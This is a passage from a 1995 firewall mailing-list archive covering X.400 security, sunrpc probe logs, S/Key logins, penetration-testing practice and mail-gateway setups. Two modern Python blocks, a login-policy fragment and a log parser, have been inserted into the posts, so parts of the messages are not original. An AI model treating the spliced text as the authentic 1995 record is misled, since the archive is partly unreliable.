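                         ("guest", "modem"), ("root", "ssh")):
        print(f"{user:>7} via {medium:<7}: {login_decision(user, medium, trusted)[0]}")
```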
And it does the same for anyone who has a trusted account (i.e. group wheel, etc). You may wish to alter this policy for ssh/STEL/deslogin accesses, as appropriate.

What I'm aiming to solve here is the "oh, just let me login, oops, forgot to use skey, let me retype that" and similar, where although the password may not necessarily give an outsider access, if they snoop'd that password, it's a little bit easier.

I've considered that it does provide some information that the account is trusted (i.e. a potentially richer target for leading to a breakin) but to my mind, this gives much better protection - not even allowed to guess the password, even if you might be right.

If something already has this behaviour, please point me at it, but as far as I am aware, nothing will stop you entering a password if you have already entered a username, especially if it is valid.

Thoughts?

darren

From firewalls-owner Thu Aug 3 10:10:09 1995
From: Greg Wynne
Date: Thu, 3 Aug 95 16:28:28 PDT
To: Bill Bunting, firewalls@greatcircle.com
Subject: RE: Protecting X.400 anyone?
On Tue, 1 Aug 1995 15:55:11 -0400 Bill Bunting wrote:

>Can anyone answer some/all of the following about X.400 in a firewalled
>environment.

My best try at the questions.

>* What are the best methods to protect X.400 and X.500?

Depends what you want to protect them against, whether you are worried about them as an entry point to your system or against malicious X.400 and X.500 connections. In terms of a hacking threat then the base systems offer little scope for threats although remote interfaces may be a problem in some products. An X.400 MTA-MTA connection (P1) has no human interface and the P1 protocol in my opinion does not constitute a hacking threat as everything is encoded in ASN.1 BER and there is no access to system commands. X.400 user agents or remote user agents may be more of a problem but again all data is ASN.1 BER encoded. X.500 DUAs are similar to X.400 user agents. If you are worried about illegal X.400 or X.500 access then the base protocols make it difficult to forge the originator of a message or request and X.500 in particular has built in access control for the information held in the directory.

>* What is the best source of information on the WWW about X.400/X.500 and
>how it relates to firewalls?

I know of no source.

>* Do you use a proxy for X.400, something like SMAP, or what?

I know of no proxy as such, because X.400 MTAs are inherently proxies in some ways but there are secure gateways which check originator/recipient addresses and can be used to create messaging closed user groups. What is SMAP???

>* What is the comms flow for X.400 using TCP/IP i.e. ports in use and
>protocol information? (where is this best documented [RFC ####, http:####] ?

RFC 1006 describes the TCP ports to be used. The X.400 protocols are described in the X.400 standards.
>* Is there any freeware or public domain source code available to protect
>X.400/X.500?

Depends what you mean by protect, but I am not specifically aware of any.

>* Does anyone have any experience they would like to share about X.400/X.500?

What aspects are you particularly interested in?

>* If I should have to develop an X.400 proxy/protector which public domain
>implementation of X.400/X.500 (source code) is available/best?

The only public domain software I am aware of was in the Isode package but that has now been removed from the public domain and is managed by the Isode Consortium; there may be old versions around.

Good luck.

----------------------------------------------------------
Name:   Greg Wynne, Axsis Consultants Ltd
E-mail: greg@axsis.co.uk
WWW:    http://www.axsis.co/~axinfo
Date:   08/03/95      Time: 16:28:28
----------------------------------------------------------

From firewalls-owner Thu Aug 3 10:10:16 1995
From: "David Glosser"
Date: 3 Aug 1995 12:31:47 U
To: "fw"
Subject: sun rpc activity

We have been logging the following activity:

Jul 29 13:34:19 udp 192.99.99.10/3081 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 29 13:34:19 udp 192.99.99.10/3082 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 29 13:34:19 udp 192.99.99.10/3083 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:20:09 udp 192.99.99.10/1199 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:20:10 udp 192.99.99.10/1200 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:20:11 udp 192.99.99.10/1201 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:20:12 udp 192.99.99.10/1202 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:37:42 udp 192.99.99.10/1093 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:37:43 udp 192.99.99.10/1094 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:37:44 udp 192.99.99.10/1095 -> 192.99.99.255/sunrpc 112 !pass (14)
Jul 31 14:37:45 udp 192.99.99.10/1096 -> 192.99.99.255/sunrpc 112 !pass (14)

Needless to say, our IP addresses are not anywhere near those listed above. Does anyone have any idea what these are? You may e-mail me privately and I will summarize if there is interest.

Thanks in advance,
David Glosser
Glosser@bbdo.com

From firewalls-owner Thu Aug 3 10:30:14 1995
From: "Frank K. Senter"
Date: Thu, 3 Aug 1995 10:38:10 -0500 (CDT)
To: Ian Cooper
Cc: firewalls@greatcircle.com
Subject: Re: NetSp wins Trust Award

A consultant told me that IBM's NetSP SNG is a "circuit gateway" type of firewall, as compared to packet filters or proxy gateways. Can someone explain?

Also, I think the consultant may have confused the two "NetSP" products. Any confusion over these separate applications is entirely IBM's fault...
Frank Senter
Senior Information Specialist
Missouri Highway and Transportation Department
P.O. Box 270
Jefferson City MO 65102

From firewalls-owner Thu Aug 3 10:38:51 1995
From: Mark
Date: Thu, 3 Aug 1995 19:48:48 +1000 (E )
Message-Id: <199508030848.AA15029@junkers.lochard.com.au>
To: PAWLUK_JEAN@tandem.com
Cc: firewalls@GreatCircle.COM
Subject: Re: Where are the known "den of thieves" sites ?
In-Reply-To: <199508021816.AA22329@comm.tandem.com> from "PAWLUK_JEAN@tandem.com" at Aug 2, 95 02:33:00 pm

>Being a newbie I wondered who are these known sites ? Who knows about them ?
>Where can I get that info ? I've never seen an alert that says such and
>such site or ip address is a known source of trouble so who is passing this
>info along ? Are there lists ?

I always found cert.org to be constantly involved in computer security breakins.
:) sorry, Mark

From firewalls-owner Thu Aug 3 11:12:22 1995
From: "Steele "
Subject: Re: TIS on solaris 2.4?
Organization: Xetron Corp.
References: <9508030755.AA01467@amchelix.amc.uva.nl>
To: firewalls@greatcircle.com
Date: Thu, 3 Aug 1995 12:37:13 GMT

F.Wetzels@amc.uva.nl wrote:
>...
>fpmw> I am compiling the TIS toolkit on solaris 2.4. The compiler is complaining
>fpmw> about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist. ..
>
>Sorry, found it. in sys/sockio.h
>
>Propably a braindead `grep'
   ^
   |
..or something like that. Sorry, couldn't resist.
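As an added example (not part of David Glosser's post above, nor code from the list), here is a parser for the packet-screen log lines he quoted, with a summary that groups the denied hits by flow and flags subnet-broadcast destinations. The sample lines are the ones from his post; the field names are my own reading of that format.

```python
"""Parser for the packet-screen log format quoted by David Glosser.

Added example, not code from the original post. The field layout
(timestamp, protocol, src/port -> dst/port, length, action, rule number)
is read off his sample lines; the field names are my own naming.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Format seen in the post:
# "Jul 31 14:37:42 udp 192.99.99.10/1093 -> 192.99.99.255/sunrpc 112 !pass (14)"
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<proto>[a-z]+) (?P<src>[\d.]+)/(?P<sport>\w+) -> "
    r"(?P<dst>[\d.]+)/(?P<dport>\w+) (?P<length>\d+) "
    r"(?P<action>!?[a-z]+) \((?P<rule>\d+)\)$"
)

# Lines from the post, kept as a built-in sample so the module runs offline.
SAMPLE = [
    "Jul 31 14:20:12 udp 192.99.99.10/1202 -> 192.99.99.255/sunrpc 112 !pass (14)",
    "Jul 31 14:37:42 udp 192.99.99.10/1093 -> 192.99.99.255/sunrpc 112 !pass (14)",
    "Jul 31 14:37:43 udp 192.99.99.10/1094 -> 192.99.99.255/sunrpc 112 !pass (14)",
    "Jul 31 14:37:44 udp 192.99.99.10/1095 -> 192.99.99.255/sunrpc 112 !pass (14)",
    "Jul 31 14:37:45 udp 192.99.99.10/1096 -> 192.99.99.255/sunrpc 112 !pass (14)",
]


@dataclass(frozen=True)
class ScreenEvent:
    stamp: str      # "Jul 31 14:37:42" (the log carries no year)
    proto: str
    src: str
    sport: str      # port number or /etc/services name, exactly as logged
    dst: str
    dport: str
    length: int
    passed: bool    # "pass" vs "!pass"
    rule: int       # rule number in parentheses


def parse_line(line: str) -> Optional[ScreenEvent]:
    """Return a ScreenEvent, or None for a line that is not in this format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return ScreenEvent(
        stamp=f"{m['mon']} {int(m['day']):2d} {m['time']}",
        proto=m["proto"], src=m["src"], sport=m["sport"],
        dst=m["dst"], dport=m["dport"], length=int(m["length"]),
        passed=not m["action"].startswith("!"), rule=int(m["rule"]),
    )


def looks_like_broadcast(addr: str) -> bool:
    """Heuristic: a destination ending in .255 is a subnet-directed broadcast
    on the classful /24 nets common in 1995; adjust for your own netmask."""
    return addr.endswith(".255") or addr == "255.255.255.255"


def summarize(lines: List[str]) -> dict:
    """Group events by flow so repeated hits show up as one counted entry."""
    events = [e for e in map(parse_line, lines) if e is not None]
    flows = Counter((e.src, e.dst, e.dport, e.proto) for e in events)
    return {
        "total": len(events),
        "unparsed": len(lines) - len(events),
        "denied": sum(1 for e in events if not e.passed),
        "by_flow": flows,
        "broadcast_targets": {e.dst for e in events if looks_like_broadcast(e.dst)},
        "source_ports": sorted({e.sport for e in events},
                               key=lambda p: int(p) if p.isdigit() else -1),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE)
    for (src, dst, dport, proto), n in s["by_flow"].most_common():
        print(f"{n:4d}  {proto} {src} -> {dst}/{dport}")
    print("broadcast destinations:", ", ".join(sorted(s["broadcast_targets"])))
```

On his sample the summary collapses to a single flow, five denied UDP hits from one host to the subnet broadcast address on sunrpc, which is the shape worth recognising before asking what the source is.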
From firewalls-owner Thu Aug 3 11:20:05 1995
Date: Thu, 3 Aug 1995 07:50:19 -0700
To: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
From: bhusler@community.net (Bill Husler)
Subject: Re: Huge gapping hole in Win95
Cc: firewalls@GreatCircle.COM

At 9:42 PM 8/1/95, Stefan Jon Silverman wrote:
>Folks:
>
>  Can anybody suggest a software / hardware package that will address
>the issue of "big foot in mouth disease."
>

I wouldn't be too quick to apologize. I have the same concerns, and they were not soothed by watching how you got jumped on for expressing a reasonable concern. Although it sounds reasonable to say that they only ship intimate details about your system (and those you're connected to) after asking if it's OK, I don't think it unreasonable to expect that one or two departmental users on a 4000-user network may go out and buy their own copies and not be sophisticated enough to understand the corporate ramifications of automating such a response.
Bill

Bill Husler
bhusler@community.net

From firewalls-owner Thu Aug 3 11:51:49 1995
Date: Thu, 3 Aug 1995 08:25:54 -0500
To: firewalls@greatcircle.com
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Subject: Re: Sidewinder challenge, Re: multilevel security in firewalls

Drat. Just got some good discussion going and life intervenes to slow me down for a few days.

Thanks for ALL the mail and discussions, folks. 40+ messages is quite a shock after living in the vacuum of being one of the only people asking these kinda questions so often. I love it. I'm working my way through it, but don't want to lose the focus or give anyone the impression that I have ignored their important points. As a practical matter, I'm as busy as anyone (methinks the world has gotten pretty crazy of late). The current plan is to pick this all up again in a few days and fix my inability to deal with it by cataloguing and organizing it all in the process of wading through the pile of unread mail.

I can't show up at DEFCON until after the Sidewinder demo has folded up. Anyone going to go out there for it?
If so, I'd like to work with you to summarize it and make this summary available along with a summary of the many great, cogent discussions that have taken place here - as part of a larger effort to stop the current electronic madness in my life.

Meantime, I hope to beg the list's indulgence and *beg* for you to share your pet ways to keep such threads alive and organized without inventing a fourth shift for myself every day ;)

RayK 8) - Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Thu Aug 3 12:01:20 1995
Date: Thu, 3 Aug 95 08:52:48 PDT
From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks)
Message-Id: <9508031552.AA17195@olympics.Eng.Sun.COM>
To: mjr@iwi.com, craiga@Ipsilon.COM
Subject: Re: connectathon: BOGUS // testing methodologies
Cc: firewalls@greatcircle.com

>From firewalls-owner@GreatCircle.COM Wed Aug 2 16:49:58 1995
>From: Craig Anderson
>My purpose in suggesting a Connectathon-like event was to try and
>remove some of the FUD from this industry (but then, that's what
>security is all about, right? :-).

Nope. There are enough real threats without introducing FUD.

> FUD hurts everyone. It's too
>easy for anyone to sell FUD and do nothing for the customer.

Agreed. But the media seems to just love to publish it :-) :-\

> The
>industry must have some form of accountability. Some measure of
>quality and objectivity.

Then what you're really looking for is an Underwriters Laboratories (UL) approval? Or at least an OSHA standard? Or something?????? This (imho) is why many buyers require Orange Book security. Not because Orange Book is correct for business BUT because there is NO other reasonable Standard for Security.

> Otherwise, how many of you consultants
>want to start paying for malpractice insurance?

This is why contracts are negotiated by Lawyers instead of just a handshake :-(

>
>Maybe the firewall vendor audits and warrantees the installation
>of it's firewall, or leases the firewall to the customer and
>provides operational support for it (or through the ISP).

Yes, most do.

>
>Come on guys, you can't sell FUD forever.

I don't need to and neither do many others.

> How do I, as a customer,
>know what I'm paying for?

There should have been a requirements phase where *you* told the vendor/consultant what you wanted, and they documented what *you* said, and they should be using that as a list of deliverables and quoting you a price based on *your* requirements. Don't buy off (pay them) until those requirements are filled and documented. If you don't get a finalized document that details *all* the work completed and documents *all* the changes made and the reason for each, then complain!!!!!! It's your dollars being spent; demand to get your money's worth. Also a TOI (transfer of information) should be one of your requirements.
Make sure it's listed in your requirements. You should never walk away not knowing what you paid for. If you do, then I would say you _did_ get swindled even if the work was done correctly. A good consultant group is supposed to solve your problems and let you sleep at night, not keep you up wondering.

>
>What do you say for yourselves vendors?

That's about it. :-)

>
>Craig Anderson
>
>

=======================================================================
Brad Powell : brad.powell@Sun.COM    Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc.
=======================================================================

From firewalls-owner Thu Aug 3 12:10:53 1995
Date: Thu, 3 Aug 1995 09:47:52 -0500 (CDT)
From: Dale Whiteaker-Lewis
To: dannyc@gmap.leeds.ac.uk
cc: firewalls@greatcircle.com
Subject: Re: an alternative for our email

Well, first off, I am a reluctant baby-sitter for the cc:Mail SMTPLINK product at our company. The product seems to have really stunk, up to version 2.1. I have tried to set this up to be amenable to safe mailing; I hope I've done a good job, and would appreciate hearing if I've missed something obvious. After typing the message below, I can already see one small problem. It's amazing what even the anticipation of peer review can do to sharpen your senses!

The way we have it set up is:

                  --------------
                  |   Cisco    |
                  --------------
                        |
                        |   -----------
                        +---| Solaris |
                        |   |   box   |
                        |   -----------
                        |
                  ----------------
                  | SGI running  |
                  | packet screen|
                  ----------------
                        |
   ----------           |            --------------
   | SMTPLINK |---------+------------| HP mailhost |
   ----------                        --------------

The Solaris box (in the "lobby" or DMZ) has no local mail users, so it can run Sendmail as a non-root user and forward it on to the "HP mailhost" through a hole punched in the SGI packet screen. On the HP, we have 8.6.something Sendmail with a mailertable entry that forwards all mail of the form @pc.radian.com to the SMTPLINK PC and delivers all @radian.com mail locally. As an added treat, the mail alias file on the HP has 2000+ entries for our employees so that mail sent to Joe_Blow@radian.com gets aliased to Joe_Blow@pc.radian.com and delivered to SMTPLINK.

The key feature of SMTPLINK that we use to accomplish all this is "Smart Addressing". That is, if you relay a message to SMTPLINK with a destination of Joe_Blow, it first looks in the cc:Mail directory for a "Joe Blow", then a "Blow, Joe" (which is the way we define people). That way, I don't have to manually maintain the aliases file to translate SMTP to cc:Mail addresses.

One final neat trick you can do is, if you define an SMTP user as the administrator in the SMTPLINK setup, you can set propagation so that a user on the SMTP side of the gateway gets UUENCODED versions of all the directory updates. We take those, run them through a sh/awk script and automatically update the alias file. Pretty cool, huh?
:-)

Of course, I've been mucking with this thing for several years, and just now have it automated. It fails way too often, and used to take up way too much of my time. If you're interested in the sh/awk scripts that do the update, let me know.

Dale Whiteaker-Lewis, Sys Admin
Dale_Whiteaker-Lewis@radian.com
BOX 201088 Austin, TX 78720
Radian Corporation
All my opinions are not Radian's

From firewalls-owner Thu Aug 3 12:27:27 1995
Date: Thu, 3 Aug 1995 08:25:10 -0500
To: firewalls@greatcircle.com
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Subject: Re: Using miltilevel systems for firewalls

Bob writes:
>> ... secure channels...seem to require trusted systems
>Hummmmm. Ok.

Have any other ways to do this besides a trusted system?
>> So, I propose that anyone who is serious about mapping their infrastructure
>> across a network (especially a public network like the Internet) needs to
>> use multilevel systems - unless they only have one classification of data
>> that they don't care about. I've never seen such an organization - anyone
>> else?
>Well, if you do government work you'll find them everywhere.

I'm sure, and they certainly don't have the exclusive lease on this turf.

>>... What I commonly hear: "Security? Yeah,
>> 'gimmie a little 'o that, will ya?"
>One of the problems is cultural. Trying to get folks in the commercial
>side to now come up to speed on information security, where it has
>never been an issue before is difficult. Hell those who have been
>dealing with it in the USG for years can't get it right half the time.

Indeed; however, there *are* commercial organizations who do take it seriously. The real question is WHY it usually takes a nasty incident (or the threat of one) to wake 'em up. My answer - Grace Hopper used to say that the only way we (as a civilization) know how to change is through crisis. Was she right? If so, perhaps I should raise my rates and specialize in incident handling ;)

>> It just looks like a gigantic connect-o-ramma out here - or, is it just me?
>NSA, DISA, NIST and others have been struggling with this MLS business
>for years. They have been able to prove it out quite nicely in the
>lab. But getting the concept to work in a manner that the user
>community can easily deal with is a whole different story. NSA has
>invested hundreds of millions in a program called MISSI (Multi-level
>Information Systems Security Initiative) designed to provide protection
>of both USG classified and unclassified but sensitive information of
>differing classification levels traversing the same paths. Industry
>technologists have essentially solved the technical problems. What's
>left are mainly policy, standardization and rice bowl issues which for
>government will take up whole careers.

Great summary and perspective. So, in the meantime - we on the private sector side simply have to wait for another decade of experience with confidentiality and integrity questions as our privacy and infrastructures are undermined? Will it take legislation that holds commercial enterprise (and us personally) accountable for protecting information to speed the process? If so, does this mean that commercial systems will have to be licensed (e.g., auto emission control seems to have taken laws to enforce...)? Every time I think about this, I hear the faint sounds of the thin ice under my feet cracking ;) Perhaps I should give this career over for one that has better prospects for making a difference ;) Well, at least I am trying to help, so I guess I can go to my grave knowing that I didn't give up? Wonder how a headstone inscription - "Labored tirelessly in frustration" - will stack up with the others in the graveyard? ;)

>Commercial industry on the other hand are already solving these
>problems. Companies that are in the business of developing hardware
>and software security products are at work developing the very
>architectures you refer to above. Trust me, I own stock in a couple of
>them, I've seen the alpha models and they work. It won't be long.

Great! Also, just having come from "authentication land" (CyberSAFE - Kerberos), I - too - have some hope. However, things seem to be a big enough mess that market penetration to the extent that security is "built in" as a commodity item is a long time away - maybe even a lifetime? Do you know of any commercial enterprises that have awakened to this technology past the point of reacting to incidents? I know of few.

RayK 8) - Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Thu Aug 3 13:27:24 1995
Date: Thu, 3 Aug 1995 08:25:43 -0500
To: Firewalls@GreatCircle.COM
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Subject: Re: Sidewinder Challenge
Cc: padgett@tccslr.dnet.mmc.com

Padgett writes:
>mjr writes:
>> Rather than see "take a blindfolded shot at the system"
>>firewalls tests, I'd rather see: "here is a detail of our design,
>>take it and study the exact configuration you will be attacking
>>and come back in a week with testing tools" approach. Anything
>>else is security through obscurity, and hopefully we've learned
>>that that's not very good.
>I agree with Marcus with the additional comment: periodically I get requests
>from people to "try to break into system xxxx and see if it is secure".
>I always refuse (maybe why I haven't been promoted in ten years), not
>because there are any doubts that it can be done, but because Things May
>Get Broken in the process.
This parallels my experience and I agree. So, how do we move the status quo to our shared point of view? It seems that if we take some of these things one small step at a time, we can build a significant collection of war stories to support our position that everyone can use. ... Or, do we have to wait until one of us has the time / resources to do a book on the subject? Anyone know of good stories about attack efforts that went awry? I have a few that I'll share as I have time.

>The right way is to first study the system in question off line: the
>network configuration, the ACLs, the design rules. Once a good understanding
>of the concept is made, then study the policies involved (what ? you don't
>have any ? Then what am I testing ? - always have a sample set when you say
>this BTW).
>
>Next examine the perimeter for "leaks" - conduct a modem sweep. Call the
>phone company and ask about leased lines. Sweep the network for unknown
>nodes (have *never* seen a paper list that was up-to-date - have even found
>entire unlisted subnets).
>
>At this point you should not have to do any penetration testing, you should
>be able to predict all vulnerabilities. Of course you are going to need
>to demonstrate them since no-one will believe you but there should not be
>any element of doubt, you should know.

Agreed. Now, you can see why I think we need an "Attack-a-thon" where people can see these first-order principles demonstrated *before* they bankrupt people like me and Marcus by jerking our chains for "system break-in quote RFP responses" and make people like you (who are credentialed in a formal manner) wonder why you aren't as successful as those who go do attacks? Seems that such "please come attack my system to prove that it is secure" only comes up with one stupid and obvious problem to report, which the client's management poo-poos as noise.

One attempt to change this status quo is reportedly being made at the DEFCON hacker conference this weekend in Vegas.
Several interesting sessions seem to be focusing on explaining to "new" hackers that they need to clean up their acts and focus on more professional approaches. The reason that I bring this up is that it seems that maybe one of my recurrent fantasies may be a reality soon. I have always wanted to do an attack on a commercial organization wherein I'd materially affect their business (maybe even improve it ;) ) and then use this position to change the lay of the land. For instance, wouldn't it be great if you walked into a board room and told the CEO to get out of your chair since you now owned the place?

Although I agree with your earlier point about:
>Things May
>Get Broken in the process.

In my own experience, a stock exchange once called for an attack on their firewall. I took them seriously and went to do my homework. I assembled critical mass (people, knowledge, and tools) to effect an attack goal: actually trade and move some money around. I'm pretty convinced that a dedicated attack that is properly designed, well funded, and well executed *WILL* succeed. As an example, during the L.A. riots, a friend commented that a well disciplined team of specialized criminals could have cleaned up amid the pandemonium by picking out selected jewelry stores and bank branches for professional heists. If nothing else, it seems that the frailty of most systems guarantees the success of a dedicated attack. The prospective client was horrified that I actually proposed to slip in and out during the heat of the middle of the trading day. Their idea was that I'd come on a Sunday and piddle with things when they were slow, and they were afraid that they'd all lose their jobs *if* I succeeded. They weren't so much worried about my mucking up their production systems, but were more worried about this than seemed justified given that I proposed a surgical strike.
>However, while the Sidewinder challenge is somewhat flawed technically, it
>is good marketing particularly when the target is people with money who know
>little/nothing about firewalls. You could have the best product in the world
>but it will fail in the marketplace without effective marketing and I would
>rather see the sales go to a product with potential like Sidewinder from an
>in-depth company than to a one-trick-pony with a glossy GUI as happened in
>the anti-virus market.

No question there! One question that remains is how to keep this playing field level.

>But then what would I know, am not particularly successful.

Well, that depends on how you measure success. I - for one - have benefited greatly from your experience. (More kudos when I can take the time to say them right.)

Meantime, how to collect and distill some of this for practical use in helping solve firewall (and general infrastructure security) problems for us all? I keep coming back to the idea that we need a hack-a-thon that is properly designed, executed, and reported. Or, am I just going to end up looking at another dusty journal of experience on a library shelf? While there is a good argument to be made for me to just go do this, I wonder if anyone would even take note. 'Course, it may be that all we need is a good marketing / PR type to make this pretty enough to catch people's fancy and make it a doable do?

RayK 8) - Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.
From firewalls-owner Thu Aug 3 13:37:20 1995
From: "Steve Lodin"
Message-Id: <9508031420.ZM16768@kocrsw26.delcoelect.com>
Date: Thu, 3 Aug 1995 14:20:33 -0500
To: Firewalls@greatcircle.com
Subject: Virtual Private Network Enabling Technologies

Hi,

A couple of weeks ago we had a discussion about virtual private networks running on top of the Internet. Does anyone have a list or web site with the enabling technologies to implement VPNs? I'll take any references including white papers and commercial recommendations.
Steve
--
Steve Lodin (317)451-0479
Delco Electronics Corporation
http://www.cs.purdue.edu/people/swlodin
Information & Systems Protection
Purdue University COAST Project
swlodin@delcoelect.com
swlodin@cs.purdue.edu

From firewalls-owner Thu Aug 3 13:49:01 1995
From: Doug Hughes
Date: Thu, 3 Aug 1995 12:35:39 -0500
Subject: Re: /etc/services on Solaris
To: dannyc@gmap.leeds.ac.uk
Cc: firewalls@greatcircle.com
In-Reply-To: <3565.9508030917@gmap.leeds.ac.uk>

>Thanks for various comments regarding cc:Mail etc. If anyone else has opinions
>I look forward to hearing them.
>
>I'm going through my /etc/services file again (Solaris 2.3). The FW+Inet
>Security bible makes a load of recommendations about what to allow -
>however it doesn't consider all the entries in the default solaris services
>file, viz
>
>name 42/udp nameserver
>rje 77/tcp
... stuff deleted....
>
>I'm inclined to take all of these out. I'm slightly wary as to whether I'm
>going to shoot myself in the foot by doing so however, as I don't really
>know what half of these do! We don't have any need for X.400 mail; I'm
>not running a printer or NFS from my firewall either. And needless to
>say I'm not running Ingres on it!!!
>Anyone comment upon whether I should
>keep any of these ?
>
>Thanks all again,
>Danny
>
>
>

There's no need to take them out. Taking them out of /etc/services doesn't mean anything other than you can't resolve a name to port number pair. In my opinion, you would be doing yourself a disservice if it ever became necessary to figure out what a service was when you were being probed on that port. Instead, why not set up something that listens on these service ports and reports the access, if you know that no legitimate traffic could possibly come on these ports?

--
____________________________________________________________________________
Doug Hughes                                    Engineering Network Services
System/Net Admin                                         Auburn University
doug@eng.auburn.edu
"Real programmers use cat > file.as"

From firewalls-owner Thu Aug 3 14:00:57 1995
Date: Thu, 3 Aug 1995 15:36:58 -0500 (CDT)
From: Michael Brennen
To: Darren Reed
cc: Firewalls Mailing List
Subject: Re: preventing password accidents.
In-Reply-To: <199508031550.IAA22775@mycroft.GreatCircle.COM>

On Fri, 4 Aug 1995, Darren Reed wrote:

> What I'd like to propose is that firewalls and other systems which
> require the use of reuseable passwords take preventative measures,
> to stop a potentially harmful/critical password being entered across
> an insecure medium.
ie if it sees the username "root" given to the > "login:" prompt, it drops the connection immeadiately with no > "Password:" prompt sent back. And it does the same for anyone who has > a trusted account (ie group wheel, etc). You may wish to alter this > policy for ssh/STEL/deslogin accesses, as appropriate. > If something already has this behaviour, please point me at it, but as > far as I am aware, nothing will stop you entering a password if you > have already entered a username, especially if it is valid. A properly configured S/Key system will prevent this. The trick is the /etc/skey.access file to require S/Key from non-local sites. I have a particular login that does not require S/Key locally, but will not accept the reusable password remotely. S/Key is required for remote login on that ID. Nothing prevents me from *trying* to enter the password from a remote site and having it sniffed, but it won't be accepted. A short between the headphones is a different problem entirely. The combination of tcp_wrappers, S/Key and logdaemon is a rather configurable way to tighten access. The logdaemon package in addition allows configurable use of login names. I have root completely disabled from all but the local console, for example. Groups can be controlled in similar ways. Comments welcome if I have missed something... 
Michael Brennen From firewalls-owner Thu Aug 3 14:10:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04284 for firewalls-outgoing; Thu, 3 Aug 1995 10:00:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04252 for ; Thu, 3 Aug 1995 10:00:28 -0700 Received: from relay4.uu.net(192.48.96.14) by miles via smap (V1.3) id sma004186; Thu Aug 3 10:00:07 1995 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzbff18577; Thu, 3 Aug 1995 12:58:52 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA05002; Thu, 3 Aug 95 12:52:08 EDT Date: Thu, 3 Aug 1995 12:52:07 -0400 (EDT) From: Sick Puppy Subject: Question on Firewall 1 failures To: firewalls@GreatCircle.COM Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. Some time ago there were postings here about Sun's Firewall-1 failing to function as a firewall in some conditions. Is it still having problems? 2. Does anyone know how many government sites are using Sun's Firewall 1 (how many sites, not which sites). 3. I would especially like to hear from anyone who has a Firewall-1 horror story. Preferably by e-mail, as nasty hackerz might be reading the list. Any mail I receive on the subject will not be passed on to anyone else. 
Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter From firewalls-owner Thu Aug 3 14:14:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA11143 for firewalls-outgoing; Thu, 3 Aug 1995 11:54:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA11112 for ; Thu, 3 Aug 1995 11:54:23 -0700 Received: from ian.aztec.co.za(196.3.251.162) by miles via smap (V1.3) id sma011099; Thu Aug 3 11:54:07 1995 Received: by ian.oms.co.za (Smail3.1.29.1 #4) id m0se6Ih-000MeDC; Thu, 3 Aug 95 19:51 GMT Message-Id: From: Ian Cooper Subject: Re: NetSp wins Trust Award To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 19:51:26 +0000 (GMT) In-Reply-To: from "Frank K. Senter" at Aug 3, 95 10:38:10 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1174 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > A consultant told me that IBM's NetSP SNG is a "circuit gateway" type of > firewall, as compared to packet filters or proxy gateways. Can someone > explain? Also, I think the consultant may have confused the two "NetSP" > products. Any confusion over these separate applications is entirely > IBM's fault... NetSP SNG uses a SOCKS proxy for outgoing TCP connections. Since this proxies at the TCP level (as opposed to a telnet proxy, which does its work at the application protocol level), it is a circuit level relayer. It is essentially establishing a virtual circuit between source and destination hosts. As for incoming connections, as far as I know, NetSP SNG uses various application level proxies. It's really no different from any of the other firewalls out there - certainly no ground-breaking features. > > Frank Senter > Senior Information Specialist > Missouri Highway and Transportation Department > P.O. 
